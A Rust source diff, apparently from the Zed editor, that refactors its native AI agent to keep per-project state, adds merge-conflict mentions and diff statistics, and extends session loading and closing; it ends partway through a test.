+
+ fn create_session(
+ self: Rc<Self>,
+ session_id: acp::SessionId,
+ project: Entity<Project>,
+ work_dirs: PathList,
+ title: Option<SharedString>,
+ cx: &mut gpui::App,
+ ) -> Entity<AcpThread> {
+ let action_log = cx.new(|_| ActionLog::new(project.clone()));
+ let thread = cx.new(|cx| {
+ AcpThread::new(
+ None,
+ title,
+ Some(work_dirs),
+ self.clone(),
+ project,
+ action_log,
+ session_id.clone(),
+ watch::Receiver::constant(
+ acp::PromptCapabilities::new()
+ .image(true)
+ .audio(true)
+ .embedded_context(true),
+ ),
+ cx,
+ )
+ });
+ self.sessions.lock().insert(
+ session_id,
+ Session {
+ thread: thread.downgrade(),
+ response_tx: None,
+ },
+ );
+ thread
+ }
+
pub fn send_update(
&self,
session_id: acp::SessionId,
@@ -603,8 +798,12 @@ mod test_support {
}
impl AgentConnection for StubAgentConnection {
+ fn agent_id(&self) -> AgentId {
+ self.agent_id.clone()
+ }
+
fn telemetry_id(&self) -> SharedString {
- "stub".into()
+ self.telemetry_id.clone()
}
fn auth_methods(&self) -> &[acp::AuthMethod] {
@@ -621,38 +820,33 @@ mod test_support {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut gpui::App,
) -> Task<gpui::Result<Entity<AcpThread>>> {
static NEXT_SESSION_ID: AtomicUsize = AtomicUsize::new(0);
let session_id =
acp::SessionId::new(NEXT_SESSION_ID.fetch_add(1, Ordering::SeqCst).to_string());
- let action_log = cx.new(|_| ActionLog::new(project.clone()));
- let thread = cx.new(|cx| {
- AcpThread::new(
- None,
- "Test",
- Some(cwd.to_path_buf()),
- self.clone(),
- project,
- action_log,
- session_id.clone(),
- watch::Receiver::constant(
- acp::PromptCapabilities::new()
- .image(true)
- .audio(true)
- .embedded_context(true),
- ),
- cx,
- )
- });
- self.sessions.lock().insert(
- session_id,
- Session {
- thread: thread.downgrade(),
- response_tx: None,
- },
- );
+ let thread = self.create_session(session_id, project, work_dirs, None, cx);
+ Task::ready(Ok(thread))
+ }
+
+ fn supports_load_session(&self) -> bool {
+ self.supports_load_session
+ }
+
+ fn load_session(
+ self: Rc<Self>,
+ session_id: acp::SessionId,
+ project: Entity<Project>,
+ work_dirs: PathList,
+ title: Option<SharedString>,
+ cx: &mut App,
+ ) -> Task<Result<Entity<AcpThread>>> {
+ if !self.supports_load_session {
+ return Task::ready(Err(anyhow::Error::msg("Loading sessions is not supported")));
+ }
+
+ let thread = self.create_session(session_id, project, work_dirs, title, cx);
Task::ready(Ok(thread))
}
@@ -60,6 +60,9 @@ pub enum MentionUri {
GitDiff {
base_ref: String,
},
+ MergeConflict {
+ file_path: String,
+ },
}
impl MentionUri {
@@ -215,6 +218,9 @@ impl MentionUri {
let base_ref =
single_query_param(&url, "base")?.unwrap_or_else(|| "main".to_string());
Ok(Self::GitDiff { base_ref })
+ } else if path.starts_with("/agent/merge-conflict") {
+ let file_path = single_query_param(&url, "path")?.unwrap_or_default();
+ Ok(Self::MergeConflict { file_path })
} else {
bail!("invalid zed url: {:?}", input);
}
@@ -245,6 +251,13 @@ impl MentionUri {
}
}
MentionUri::GitDiff { base_ref } => format!("Branch Diff ({})", base_ref),
+ MentionUri::MergeConflict { file_path } => {
+ let name = Path::new(file_path)
+ .file_name()
+ .unwrap_or_default()
+ .to_string_lossy();
+ format!("Merge Conflict ({name})")
+ }
MentionUri::Selection {
abs_path: path,
line_range,
@@ -306,6 +319,7 @@ impl MentionUri {
MentionUri::Selection { .. } => IconName::Reader.path().into(),
MentionUri::Fetch { .. } => IconName::ToolWeb.path().into(),
MentionUri::GitDiff { .. } => IconName::GitBranch.path().into(),
+ MentionUri::MergeConflict { .. } => IconName::GitMergeConflict.path().into(),
}
}
@@ -409,6 +423,11 @@ impl MentionUri {
url.query_pairs_mut().append_pair("base", base_ref);
url
}
+ MentionUri::MergeConflict { file_path } => {
+ let mut url = Url::parse("zed:///agent/merge-conflict").unwrap();
+ url.query_pairs_mut().append_pair("path", file_path);
+ url
+ }
}
}
}
@@ -14,7 +14,7 @@ use gpui::{
};
use language::LanguageRegistry;
use markdown::{CodeBlockRenderer, Markdown, MarkdownElement, MarkdownStyle};
-use project::Project;
+use project::{AgentId, Project};
use settings::Settings;
use theme::ThemeSettings;
use ui::{CopyButton, Tooltip, WithScrollbar, prelude::*};
@@ -48,7 +48,7 @@ pub struct AcpConnectionRegistry {
}
struct ActiveConnection {
- server_name: SharedString,
+ agent_id: AgentId,
connection: Weak<acp::ClientSideConnection>,
}
@@ -65,12 +65,12 @@ impl AcpConnectionRegistry {
pub fn set_active_connection(
&self,
- server_name: impl Into<SharedString>,
+ agent_id: AgentId,
connection: &Rc<acp::ClientSideConnection>,
cx: &mut Context<Self>,
) {
self.active_connection.replace(Some(ActiveConnection {
- server_name: server_name.into(),
+ agent_id,
connection: Rc::downgrade(connection),
}));
cx.notify();
@@ -87,7 +87,7 @@ struct AcpTools {
}
struct WatchedConnection {
- server_name: SharedString,
+ agent_id: AgentId,
messages: Vec<WatchedConnectionMessage>,
list_state: ListState,
connection: Weak<acp::ClientSideConnection>,
@@ -144,7 +144,7 @@ impl AcpTools {
});
self.watched_connection = Some(WatchedConnection {
- server_name: active_connection.server_name.clone(),
+ agent_id: active_connection.agent_id.clone(),
messages: vec![],
list_state: ListState::new(0, ListAlignment::Bottom, px(2048.)),
connection: active_connection.connection.clone(),
@@ -483,7 +483,7 @@ impl Item for AcpTools {
"ACP: {}",
self.watched_connection
.as_ref()
- .map_or("Disconnected", |connection| &connection.server_name)
+ .map_or("Disconnected", |connection| connection.agent_id.0.as_ref())
)
.into()
}
@@ -209,7 +209,7 @@ impl ActionLog {
cx: &mut Context<Self>,
) {
match event {
- BufferEvent::Edited => {
+ BufferEvent::Edited { .. } => {
let Some(tracked_buffer) = self.tracked_buffers.get_mut(&buffer) else {
return;
};
@@ -1028,6 +1028,11 @@ impl ActionLog {
.collect()
}
+ /// Returns the total number of lines added and removed across all unreviewed buffers.
+ pub fn diff_stats(&self, cx: &App) -> DiffStats {
+ DiffStats::all_files(&self.changed_buffers(cx), cx)
+ }
+
/// Iterate over buffers changed since last read or edited by the model
pub fn stale_buffers<'a>(&'a self, cx: &'a App) -> impl Iterator<Item = &'a Entity<Buffer>> {
self.tracked_buffers
@@ -1044,6 +1049,46 @@ impl ActionLog {
}
}
+#[derive(Default, Debug, Clone, Copy)]
+pub struct DiffStats {
+ pub lines_added: u32,
+ pub lines_removed: u32,
+}
+
+impl DiffStats {
+ pub fn single_file(buffer: &Buffer, diff: &BufferDiff, cx: &App) -> Self {
+ let mut stats = DiffStats::default();
+ let diff_snapshot = diff.snapshot(cx);
+ let buffer_snapshot = buffer.snapshot();
+ let base_text = diff_snapshot.base_text();
+
+ for hunk in diff_snapshot.hunks(&buffer_snapshot) {
+ let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row);
+ stats.lines_added += added_rows;
+
+ let base_start = hunk.diff_base_byte_range.start.to_point(base_text).row;
+ let base_end = hunk.diff_base_byte_range.end.to_point(base_text).row;
+ let removed_rows = base_end.saturating_sub(base_start);
+ stats.lines_removed += removed_rows;
+ }
+
+ stats
+ }
+
+ pub fn all_files(
+ changed_buffers: &BTreeMap<Entity<Buffer>, Entity<BufferDiff>>,
+ cx: &App,
+ ) -> Self {
+ let mut total = DiffStats::default();
+ for (buffer, diff) in changed_buffers {
+ let stats = DiffStats::single_file(buffer.read(cx), diff.read(cx), cx);
+ total.lines_added += stats.lines_added;
+ total.lines_removed += stats.lines_removed;
+ }
+ total
+ }
+}
+
#[derive(Clone)]
pub struct ActionLogTelemetry {
pub agent_telemetry_id: SharedString,
@@ -37,10 +37,11 @@ use futures::channel::{mpsc, oneshot};
use futures::future::Shared;
use futures::{FutureExt as _, StreamExt as _, future};
use gpui::{
- App, AppContext, AsyncApp, Context, Entity, SharedString, Subscription, Task, WeakEntity,
+ App, AppContext, AsyncApp, Context, Entity, EntityId, SharedString, Subscription, Task,
+ WeakEntity,
};
use language_model::{IconOrSvg, LanguageModel, LanguageModelProvider, LanguageModelRegistry};
-use project::{Project, ProjectItem, ProjectPath, Worktree};
+use project::{AgentId, Project, ProjectItem, ProjectPath, Worktree};
use prompt_store::{
ProjectContext, PromptStore, RULES_FILE_NAMES, RulesFileContext, UserRulesContext,
WorktreeContext,
@@ -48,9 +49,9 @@ use prompt_store::{
use serde::{Deserialize, Serialize};
use settings::{LanguageModelSelection, update_settings_file};
use std::any::Any;
-use std::path::{Path, PathBuf};
+use std::path::PathBuf;
use std::rc::Rc;
-use std::sync::Arc;
+use std::sync::{Arc, LazyLock};
use util::ResultExt;
use util::path_list::PathList;
use util::rel_path::RelPath;
@@ -65,13 +66,23 @@ pub struct RulesLoadingError {
pub message: SharedString,
}
+struct ProjectState {
+ project: Entity<Project>,
+ project_context: Entity<ProjectContext>,
+ project_context_needs_refresh: watch::Sender<()>,
+ _maintain_project_context: Task<Result<()>>,
+ context_server_registry: Entity<ContextServerRegistry>,
+ _subscriptions: Vec<Subscription>,
+}
+
/// Holds both the internal Thread and the AcpThread for a session
struct Session {
/// The internal thread that processes messages
thread: Entity<Thread>,
/// The ACP thread that handles protocol communication
acp_thread: Entity<acp_thread::AcpThread>,
- pending_save: Task<()>,
+ project_id: EntityId,
+ pending_save: Task<Result<()>>,
_subscriptions: Vec<Subscription>,
}
@@ -235,79 +246,47 @@ pub struct NativeAgent {
/// Session ID -> Session mapping
sessions: HashMap<acp::SessionId, Session>,
thread_store: Entity<ThreadStore>,
- /// Shared project context for all threads
- project_context: Entity<ProjectContext>,
- project_context_needs_refresh: watch::Sender<()>,
- _maintain_project_context: Task<Result<()>>,
- context_server_registry: Entity<ContextServerRegistry>,
+ /// Project-specific state keyed by project EntityId
+ projects: HashMap<EntityId, ProjectState>,
/// Shared templates for all threads
templates: Arc<Templates>,
/// Cached model information
models: LanguageModels,
- project: Entity<Project>,
prompt_store: Option<Entity<PromptStore>>,
fs: Arc<dyn Fs>,
_subscriptions: Vec<Subscription>,
}
impl NativeAgent {
- pub async fn new(
- project: Entity<Project>,
+ pub fn new(
thread_store: Entity<ThreadStore>,
templates: Arc<Templates>,
prompt_store: Option<Entity<PromptStore>>,
fs: Arc<dyn Fs>,
- cx: &mut AsyncApp,
- ) -> Result<Entity<NativeAgent>> {
+ cx: &mut App,
+ ) -> Entity<NativeAgent> {
log::debug!("Creating new NativeAgent");
- let project_context = cx
- .update(|cx| Self::build_project_context(&project, prompt_store.as_ref(), cx))
- .await;
-
- Ok(cx.new(|cx| {
- let context_server_store = project.read(cx).context_server_store();
- let context_server_registry =
- cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx));
-
- let mut subscriptions = vec![
- cx.subscribe(&project, Self::handle_project_event),
- cx.subscribe(
- &LanguageModelRegistry::global(cx),
- Self::handle_models_updated_event,
- ),
- cx.subscribe(
- &context_server_store,
- Self::handle_context_server_store_updated,
- ),
- cx.subscribe(
- &context_server_registry,
- Self::handle_context_server_registry_event,
- ),
- ];
+ cx.new(|cx| {
+ let mut subscriptions = vec![cx.subscribe(
+ &LanguageModelRegistry::global(cx),
+ Self::handle_models_updated_event,
+ )];
if let Some(prompt_store) = prompt_store.as_ref() {
subscriptions.push(cx.subscribe(prompt_store, Self::handle_prompts_updated_event))
}
- let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) =
- watch::channel(());
Self {
sessions: HashMap::default(),
thread_store,
- project_context: cx.new(|_| project_context),
- project_context_needs_refresh: project_context_needs_refresh_tx,
- _maintain_project_context: cx.spawn(async move |this, cx| {
- Self::maintain_project_context(this, project_context_needs_refresh_rx, cx).await
- }),
- context_server_registry,
+ projects: HashMap::default(),
templates,
models: LanguageModels::new(cx),
- project,
prompt_store,
fs,
_subscriptions: subscriptions,
}
- }))
+ })
}
fn new_session(
@@ -315,10 +294,10 @@ impl NativeAgent {
project: Entity<Project>,
cx: &mut Context<Self>,
) -> Entity<AcpThread> {
- // Create Thread
- // Fetch default model from registry settings
+ let project_id = self.get_or_create_project_state(&project, cx);
+ let project_state = &self.projects[&project_id];
+
let registry = LanguageModelRegistry::read_global(cx);
- // Log available models for debugging
let available_count = registry.available_models(cx).count();
log::debug!("Total available models: {}", available_count);
@@ -328,21 +307,22 @@ impl NativeAgent {
});
let thread = cx.new(|cx| {
Thread::new(
- project.clone(),
- self.project_context.clone(),
- self.context_server_registry.clone(),
+ project,
+ project_state.project_context.clone(),
+ project_state.context_server_registry.clone(),
self.templates.clone(),
default_model,
cx,
)
});
- self.register_session(thread, cx)
+ self.register_session(thread, project_id, cx)
}
fn register_session(
&mut self,
thread_handle: Entity<Thread>,
+ project_id: EntityId,
cx: &mut Context<Self>,
) -> Entity<AcpThread> {
let connection = Rc::new(NativeAgentConnection(cx.entity()));
@@ -405,12 +385,13 @@ impl NativeAgent {
Session {
thread: thread_handle,
acp_thread: acp_thread.clone(),
+ project_id,
_subscriptions: subscriptions,
- pending_save: Task::ready(()),
+ pending_save: Task::ready(Ok(())),
},
);
- self.update_available_commands(cx);
+ self.update_available_commands_for_project(project_id, cx);
acp_thread
}
@@ -419,19 +400,106 @@ impl NativeAgent {
&self.models
}
+ fn get_or_create_project_state(
+ &mut self,
+ project: &Entity<Project>,
+ cx: &mut Context<Self>,
+ ) -> EntityId {
+ let project_id = project.entity_id();
+ if self.projects.contains_key(&project_id) {
+ return project_id;
+ }
+
+ let project_context = cx.new(|_| ProjectContext::new(vec![], vec![]));
+ self.register_project_with_initial_context(project.clone(), project_context, cx);
+ if let Some(state) = self.projects.get_mut(&project_id) {
+ state.project_context_needs_refresh.send(()).ok();
+ }
+ project_id
+ }
+
+ fn register_project_with_initial_context(
+ &mut self,
+ project: Entity<Project>,
+ project_context: Entity<ProjectContext>,
+ cx: &mut Context<Self>,
+ ) {
+ let project_id = project.entity_id();
+
+ let context_server_store = project.read(cx).context_server_store();
+ let context_server_registry =
+ cx.new(|cx| ContextServerRegistry::new(context_server_store.clone(), cx));
+
+ let subscriptions = vec![
+ cx.subscribe(&project, Self::handle_project_event),
+ cx.subscribe(
+ &context_server_store,
+ Self::handle_context_server_store_updated,
+ ),
+ cx.subscribe(
+ &context_server_registry,
+ Self::handle_context_server_registry_event,
+ ),
+ ];
+
+ let (project_context_needs_refresh_tx, project_context_needs_refresh_rx) =
+ watch::channel(());
+
+ self.projects.insert(
+ project_id,
+ ProjectState {
+ project,
+ project_context,
+ project_context_needs_refresh: project_context_needs_refresh_tx,
+ _maintain_project_context: cx.spawn(async move |this, cx| {
+ Self::maintain_project_context(
+ this,
+ project_id,
+ project_context_needs_refresh_rx,
+ cx,
+ )
+ .await
+ }),
+ context_server_registry,
+ _subscriptions: subscriptions,
+ },
+ );
+ }
+
+ fn session_project_state(&self, session_id: &acp::SessionId) -> Option<&ProjectState> {
+ self.sessions
+ .get(session_id)
+ .and_then(|session| self.projects.get(&session.project_id))
+ }
+
async fn maintain_project_context(
this: WeakEntity<Self>,
+ project_id: EntityId,
mut needs_refresh: watch::Receiver<()>,
cx: &mut AsyncApp,
) -> Result<()> {
while needs_refresh.changed().await.is_ok() {
let project_context = this
.update(cx, |this, cx| {
- Self::build_project_context(&this.project, this.prompt_store.as_ref(), cx)
- })?
+ let state = this
+ .projects
+ .get(&project_id)
+ .context("project state not found")?;
+ anyhow::Ok(Self::build_project_context(
+ &state.project,
+ this.prompt_store.as_ref(),
+ cx,
+ ))
+ })??
.await;
this.update(cx, |this, cx| {
- this.project_context = cx.new(|_| project_context);
+ if let Some(state) = this.projects.get(&project_id) {
+ state
+ .project_context
+ .update(cx, |current_project_context, _cx| {
+ *current_project_context = project_context;
+ });
+ }
})?;
}
@@ -594,14 +662,16 @@ impl NativeAgent {
let Some(session) = self.sessions.get(session_id) else {
return;
};
- let thread = thread.downgrade();
- let acp_thread = session.acp_thread.downgrade();
- cx.spawn(async move |_, cx| {
- let title = thread.read_with(cx, |thread, _| thread.title())?;
- let task = acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?;
- task.await
- })
- .detach_and_log_err(cx);
+
+ if let Some(title) = thread.read(cx).title() {
+ let acp_thread = session.acp_thread.downgrade();
+ cx.spawn(async move |_, cx| {
+ let task =
+ acp_thread.update(cx, |acp_thread, cx| acp_thread.set_title(title, cx))?;
+ task.await
+ })
+ .detach_and_log_err(cx);
+ }
}
fn handle_thread_token_usage_updated(
@@ -620,13 +690,17 @@ impl NativeAgent {
fn handle_project_event(
&mut self,
- _project: Entity<Project>,
+ project: Entity<Project>,
event: &project::Event,
_cx: &mut Context<Self>,
) {
+ let project_id = project.entity_id();
+ let Some(state) = self.projects.get_mut(&project_id) else {
+ return;
+ };
match event {
project::Event::WorktreeAdded(_) | project::Event::WorktreeRemoved(_) => {
- self.project_context_needs_refresh.send(()).ok();
+ state.project_context_needs_refresh.send(()).ok();
}
project::Event::WorktreeUpdatedEntries(_, items) => {
if items.iter().any(|(path, _, _)| {
@@ -634,7 +708,7 @@ impl NativeAgent {
.iter()
.any(|name| path.as_ref() == RelPath::unix(name).unwrap())
}) {
- self.project_context_needs_refresh.send(()).ok();
+ state.project_context_needs_refresh.send(()).ok();
}
}
_ => {}
@@ -647,13 +721,15 @@ impl NativeAgent {
_event: &prompt_store::PromptsUpdatedEvent,
_cx: &mut Context<Self>,
) {
- self.project_context_needs_refresh.send(()).ok();
+ for state in self.projects.values_mut() {
+ state.project_context_needs_refresh.send(()).ok();
+ }
}
fn handle_models_updated_event(
&mut self,
_registry: Entity<LanguageModelRegistry>,
- _event: &language_model::Event,
+ event: &language_model::Event,
cx: &mut Context<Self>,
) {
self.models.refresh_list(cx);
@@ -670,37 +746,65 @@ impl NativeAgent {
thread.set_model(model, cx);
cx.notify();
}
- thread.set_summarization_model(summarization_model.clone(), cx);
+ if let Some(model) = summarization_model.clone() {
+ if thread.summarization_model().is_none()
+ || matches!(event, language_model::Event::ThreadSummaryModelChanged)
+ {
+ thread.set_summarization_model(Some(model), cx);
+ }
+ }
});
}
}
fn handle_context_server_store_updated(
&mut self,
- _store: Entity<project::context_server_store::ContextServerStore>,
+ store: Entity<project::context_server_store::ContextServerStore>,
_event: &project::context_server_store::ServerStatusChangedEvent,
cx: &mut Context<Self>,
) {
- self.update_available_commands(cx);
+ let project_id = self.projects.iter().find_map(|(id, state)| {
+ if *state.context_server_registry.read(cx).server_store() == store {
+ Some(*id)
+ } else {
+ None
+ }
+ });
+ if let Some(project_id) = project_id {
+ self.update_available_commands_for_project(project_id, cx);
+ }
}
fn handle_context_server_registry_event(
&mut self,
- _registry: Entity<ContextServerRegistry>,
+ registry: Entity<ContextServerRegistry>,
event: &ContextServerRegistryEvent,
cx: &mut Context<Self>,
) {
match event {
ContextServerRegistryEvent::ToolsChanged => {}
ContextServerRegistryEvent::PromptsChanged => {
- self.update_available_commands(cx);
+ let project_id = self.projects.iter().find_map(|(id, state)| {
+ if state.context_server_registry == registry {
+ Some(*id)
+ } else {
+ None
+ }
+ });
+ if let Some(project_id) = project_id {
+ self.update_available_commands_for_project(project_id, cx);
+ }
}
}
}
- fn update_available_commands(&self, cx: &mut Context<Self>) {
- let available_commands = self.build_available_commands(cx);
+ fn update_available_commands_for_project(&self, project_id: EntityId, cx: &mut Context<Self>) {
+ let available_commands =
+ Self::build_available_commands_for_project(self.projects.get(&project_id), cx);
for session in self.sessions.values() {
+ if session.project_id != project_id {
+ continue;
+ }
session.acp_thread.update(cx, |thread, cx| {
thread
.handle_session_update(
@@ -714,8 +818,14 @@ impl NativeAgent {
}
}
- fn build_available_commands(&self, cx: &App) -> Vec<acp::AvailableCommand> {
- let registry = self.context_server_registry.read(cx);
+ fn build_available_commands_for_project(
+ project_state: Option<&ProjectState>,
+ cx: &App,
+ ) -> Vec<acp::AvailableCommand> {
+ let Some(state) = project_state else {
+ return vec![];
+ };
+ let registry = state.context_server_registry.read(cx);
let mut prompt_name_counts: HashMap<&str, usize> = HashMap::default();
for context_server_prompt in registry.prompts() {
@@ -769,6 +879,7 @@ impl NativeAgent {
pub fn load_thread(
&mut self,
id: acp::SessionId,
+ project: Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<Entity<Thread>>> {
let database_future = ThreadsDatabase::connect(cx);
@@ -780,41 +891,49 @@ impl NativeAgent {
.with_context(|| format!("no thread found with ID: {id:?}"))?;
this.update(cx, |this, cx| {
+ let project_id = this.get_or_create_project_state(&project, cx);
+ let project_state = this
+ .projects
+ .get(&project_id)
+ .context("project state not found")?;
let summarization_model = LanguageModelRegistry::read_global(cx)
.thread_summary_model()
.map(|c| c.model);
- cx.new(|cx| {
+ Ok(cx.new(|cx| {
let mut thread = Thread::from_db(
id.clone(),
db_thread,
- this.project.clone(),
- this.project_context.clone(),
- this.context_server_registry.clone(),
+ project_state.project.clone(),
+ project_state.project_context.clone(),
+ project_state.context_server_registry.clone(),
this.templates.clone(),
cx,
);
thread.set_summarization_model(summarization_model, cx);
thread
- })
- })
+ }))
+ })?
})
}
pub fn open_thread(
&mut self,
id: acp::SessionId,
+ project: Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<Entity<AcpThread>>> {
if let Some(session) = self.sessions.get(&id) {
return Task::ready(Ok(session.acp_thread.clone()));
}
- let task = self.load_thread(id, cx);
+ let task = self.load_thread(id, project.clone(), cx);
cx.spawn(async move |this, cx| {
let thread = task.await?;
- let acp_thread =
- this.update(cx, |this, cx| this.register_session(thread.clone(), cx))?;
+ let acp_thread = this.update(cx, |this, cx| {
+ let project_id = this.get_or_create_project_state(&project, cx);
+ this.register_session(thread.clone(), project_id, cx)
+ })?;
let events = thread.update(cx, |thread, cx| thread.replay(cx));
cx.update(|cx| {
NativeAgentConnection::handle_thread_events(events, acp_thread.downgrade(), cx)
@@ -827,9 +946,10 @@ impl NativeAgent {
pub fn thread_summary(
&mut self,
id: acp::SessionId,
+ project: Entity<Project>,
cx: &mut Context<Self>,
) -> Task<Result<SharedString>> {
- let thread = self.open_thread(id.clone(), cx);
+ let thread = self.open_thread(id.clone(), project, cx);
cx.spawn(async move |this, cx| {
let acp_thread = thread.await?;
let result = this
@@ -857,8 +977,13 @@ impl NativeAgent {
return;
};
+ let project_id = session.project_id;
+ let Some(state) = self.projects.get(&project_id) else {
+ return;
+ };
+
let folder_paths = PathList::new(
- &self
+ &state
.project
.read(cx)
.visible_worktrees(cx)
@@ -875,7 +1000,7 @@ impl NativeAgent {
let thread_store = self.thread_store.clone();
session.pending_save = cx.spawn(async move |_, cx| {
let Some(database) = database_future.await.map_err(|err| anyhow!(err)).log_err() else {
- return;
+ return Ok(());
};
let db_thread = db_thread.await;
database
@@ -883,21 +1008,29 @@ impl NativeAgent {
.await
.log_err();
thread_store.update(cx, |store, cx| store.reload(cx));
+ Ok(())
});
}
fn send_mcp_prompt(
&self,
message_id: UserMessageId,
- session_id: agent_client_protocol::SessionId,
+ session_id: acp::SessionId,
prompt_name: String,
server_id: ContextServerId,
arguments: HashMap<String, String>,
original_content: Vec<acp::ContentBlock>,
cx: &mut Context<Self>,
) -> Task<Result<acp::PromptResponse>> {
- let server_store = self.context_server_registry.read(cx).server_store().clone();
- let path_style = self.project.read(cx).path_style(cx);
+ let Some(state) = self.session_project_state(&session_id) else {
+ return Task::ready(Err(anyhow!("Project state not found for session")));
+ };
+ let server_store = state
+ .context_server_registry
+ .read(cx)
+ .server_store()
+ .clone();
+ let path_style = state.project.read(cx).path_style(cx);
cx.spawn(async move |this, cx| {
let prompt =
@@ -996,8 +1129,14 @@ impl NativeAgentConnection {
.map(|session| session.thread.clone())
}
- pub fn load_thread(&self, id: acp::SessionId, cx: &mut App) -> Task<Result<Entity<Thread>>> {
- self.0.update(cx, |this, cx| this.load_thread(id, cx))
+ pub fn load_thread(
+ &self,
+ id: acp::SessionId,
+ project: Entity<Project>,
+ cx: &mut App,
+ ) -> Task<Result<Entity<Thread>>> {
+ self.0
+ .update(cx, |this, cx| this.load_thread(id, project, cx))
}
fn run_turn(
@@ -1068,12 +1207,11 @@ impl NativeAgentConnection {
thread.request_tool_call_authorization(tool_call, options, cx)
})??;
cx.background_spawn(async move {
- if let acp::RequestPermissionOutcome::Selected(
- acp::SelectedPermissionOutcome { option_id, .. },
- ) = outcome_task.await
+ if let acp_thread::RequestPermissionOutcome::Selected(outcome) =
+ outcome_task.await
{
response
- .send(option_id)
+ .send(outcome)
.map(|_| anyhow!("authorization receiver was dropped"))
.log_err();
}
@@ -1090,6 +1228,9 @@ impl NativeAgentConnection {
thread.update_tool_call(update, cx)
})??;
}
+ ThreadEvent::Plan(plan) => {
+ acp_thread.update(cx, |thread, cx| thread.update_plan(plan, cx))?;
+ }
ThreadEvent::SubagentSpawned(session_id) => {
acp_thread.update(cx, |thread, cx| {
thread.subagent_spawned(session_id, cx);
@@ -1255,7 +1396,13 @@ impl acp_thread::AgentModelSelector for NativeAgentModelSelector {
}
}
+pub static ZED_AGENT_ID: LazyLock<AgentId> = LazyLock::new(|| AgentId::new("Zed Agent"));
+
impl acp_thread::AgentConnection for NativeAgentConnection {
+ fn agent_id(&self) -> AgentId {
+ ZED_AGENT_ID.clone()
+ }
+
fn telemetry_id(&self) -> SharedString {
"zed".into()
}
@@ -1263,10 +1410,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
fn new_session(
self: Rc<Self>,
project: Entity<Project>,
- cwd: &Path,
+ work_dirs: PathList,
cx: &mut App,
) -> Task<Result<Entity<acp_thread::AcpThread>>> {
- log::debug!("Creating new thread for project at: {cwd:?}");
+ log::debug!("Creating new thread for project at: {work_dirs:?}");
Task::ready(Ok(self
.0
.update(cx, |agent, cx| agent.new_session(project, cx))))
@@ -1279,24 +1426,42 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
fn load_session(
self: Rc<Self>,
session_id: acp::SessionId,
- _project: Entity<Project>,
- _cwd: &Path,
+ project: Entity<Project>,
+ _work_dirs: PathList,
_title: Option<SharedString>,
cx: &mut App,
) -> Task<Result<Entity<acp_thread::AcpThread>>> {
self.0
- .update(cx, |agent, cx| agent.open_thread(session_id, cx))
+ .update(cx, |agent, cx| agent.open_thread(session_id, project, cx))
}
fn supports_close_session(&self) -> bool {
true
}
- fn close_session(&self, session_id: &acp::SessionId, cx: &mut App) -> Task<Result<()>> {
- self.0.update(cx, |agent, _cx| {
- agent.sessions.remove(session_id);
- });
- Task::ready(Ok(()))
+ fn close_session(
+ self: Rc<Self>,
+ session_id: &acp::SessionId,
+ cx: &mut App,
+ ) -> Task<Result<()>> {
+ self.0.update(cx, |agent, cx| {
+ let thread = agent.sessions.get(session_id).map(|s| s.thread.clone());
+ if let Some(thread) = thread {
+ agent.save_thread(thread, cx);
+ }
+
+ let Some(session) = agent.sessions.remove(session_id) else {
+ return Task::ready(Ok(()));
+ };
+ let project_id = session.project_id;
+
+ let has_remaining = agent.sessions.values().any(|s| s.project_id == project_id);
+ if !has_remaining {
+ agent.projects.remove(&project_id);
+ }
+
+ session.pending_save
+ })
}
fn auth_methods(&self) -> &[acp::AuthMethod] {
@@ -1325,8 +1490,12 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
log::info!("Received prompt request for session: {}", session_id);
log::debug!("Prompt blocks count: {}", params.prompt.len());
+ let Some(project_state) = self.0.read(cx).session_project_state(&session_id) else {
+ return Task::ready(Err(anyhow::anyhow!("Session not found")));
+ };
+
if let Some(parsed_command) = Command::parse(¶ms.prompt) {
- let registry = self.0.read(cx).context_server_registry.read(cx);
+ let registry = project_state.context_server_registry.read(cx);
let explicit_server_id = parsed_command
.explicit_server_id
@@ -1362,10 +1531,10 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
cx,
)
});
- };
+ }
};
- let path_style = self.0.read(cx).project.read(cx).path_style(cx);
+ let path_style = project_state.project.read(cx).path_style(cx);
self.run_turn(session_id, cx, move |thread, cx| {
let content: Vec<UserMessageContent> = params
@@ -1406,7 +1575,7 @@ impl acp_thread::AgentConnection for NativeAgentConnection {
fn truncate(
&self,
- session_id: &agent_client_protocol::SessionId,
+ session_id: &acp::SessionId,
cx: &App,
) -> Option<Rc<dyn acp_thread::AgentSessionTruncate>> {
self.0.read_with(cx, |agent, _cx| {
@@ -1611,6 +1780,7 @@ impl NativeThreadEnvironment {
};
let parent_thread = parent_thread_entity.read(cx);
let current_depth = parent_thread.depth();
+ let parent_session_id = parent_thread.id().clone();
if current_depth >= MAX_SUBAGENT_DEPTH {
return Err(anyhow!(
@@ -1627,9 +1797,16 @@ impl NativeThreadEnvironment {
let session_id = subagent_thread.read(cx).id().clone();
- let acp_thread = self.agent.update(cx, |agent, cx| {
- agent.register_session(subagent_thread.clone(), cx)
- })?;
+ let acp_thread = self
+ .agent
+ .update(cx, |agent, cx| -> Result<Entity<AcpThread>> {
+ let project_id = agent
+ .sessions
+ .get(&parent_session_id)
+ .map(|s| s.project_id)
+ .context("parent session not found")?;
+ Ok(agent.register_session(subagent_thread.clone(), project_id, cx))
+ })??;
let depth = current_depth + 1;
@@ -1929,6 +2106,8 @@ impl TerminalHandle for AcpTerminalHandle {
#[cfg(test)]
mod internal_tests {
+ use std::path::Path;
+
use super::*;
use acp_thread::{AgentConnection, AgentModelGroupName, AgentModelInfo, MentionUri};
use fs::FakeFs;
@@ -1955,18 +2134,32 @@ mod internal_tests {
.await;
let project = Project::test(fs.clone(), [], cx).await;
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let agent = NativeAgent::new(
- project.clone(),
- thread_store,
- Templates::new(),
- None,
- fs.clone(),
- &mut cx.to_async(),
- )
- .await
- .unwrap();
+ let agent =
+ cx.update(|cx| NativeAgent::new(thread_store, Templates::new(), None, fs.clone(), cx));
+
